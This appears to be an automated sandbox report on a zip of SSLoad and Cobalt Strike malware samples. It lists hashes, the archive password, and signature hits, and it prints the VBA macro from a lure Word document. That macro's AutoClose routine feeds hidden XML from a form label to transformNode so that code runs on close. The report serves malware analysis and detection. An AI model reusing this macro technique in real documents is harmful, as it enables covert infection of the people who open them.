Resubmissions

17-10-2024 13:08

241017-qc85dsydmg 10

17-10-2024 13:06

241017-qcdngssbnr 8

General

  • Target

    2024-04-18-SSLoad-and-Cobalt-Strike-malware-and-artifacts.zip

  • Size

    5.3MB

  • MD5

    30b590347982e79f8af515d7f2e49ad7

  • SHA1

    bca3f7a21b3444678b7c37831a311f0e1e172bb3

  • SHA256

    4223688925e083fbc1fb17daf06664bd64a7ddc3db30cdc67cafbe6133567cbb

  • SHA512

    9ccfa852d7685c115669a3270c959b9474d3256c98d4074a20f0d9209226e638e3ae12ba6375c24b64f2e1734b8661593c761ee4f76cf077b3ca00eaf143b71a

  • SSDEEP

    98304:Kbrqq6Ubf2zDlX3hEXsfsKfYjx7sLinqMlaMAi6Ptbgk2MFuh3XJTUit1JhZq5VQ:KD+DlXxISxEx70oqLi6PJPFuNX2iDXwM

Score
8/10

Malware Config

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Unsigned PE 2 IoCs

    Checks for missing Authenticode signature.

Files

  • 2024-04-18-SSLoad-and-Cobalt-Strike-malware-and-artifacts.zip
    .zip

    Password: infected_20240418

  • 2024-04-18-CobaltStrike-DLL.bin
    .dll regsvr32 windows:6 windows x64 arch:x64

    Password: infected_20240418

    fde5069783a744f97063c1afd7b8a158



  • 2024-04-18-IOCs-from-SSLoad-infection-with-Cobalt-Strike-DLL.txt
  • 2024-04-18-SSLoad-DLL.bin
    .dll regsvr32 windows:5 windows x86 arch:x86

    Password: infected_20240418

    c5b12c669953a1f4f98cd32040d998ff



  • 2024-04-18-scheduled-task-for-SSLoad.txt
  • Incident_Report_Harassment.doc
    .doc windows office2003

    ThisDocument

    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True

    Module1

    Attribute VB_Name = "Module1"
    Sub AUtoclose()
    Set Document = GetObject("new:MSXML2.DomDocument")
    Document.LoadXML UserForm1.Label1.Caption
    Document.transformnode Document
    End Sub

    UserForm1

    Attribute VB_Name = "UserForm1"
    Attribute VB_Base = "0{C3D577F1-DFE3-4E30-89D6-180BE62FFA79}{15CAAC9A-68B3-428A-9970-484B483C9266}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
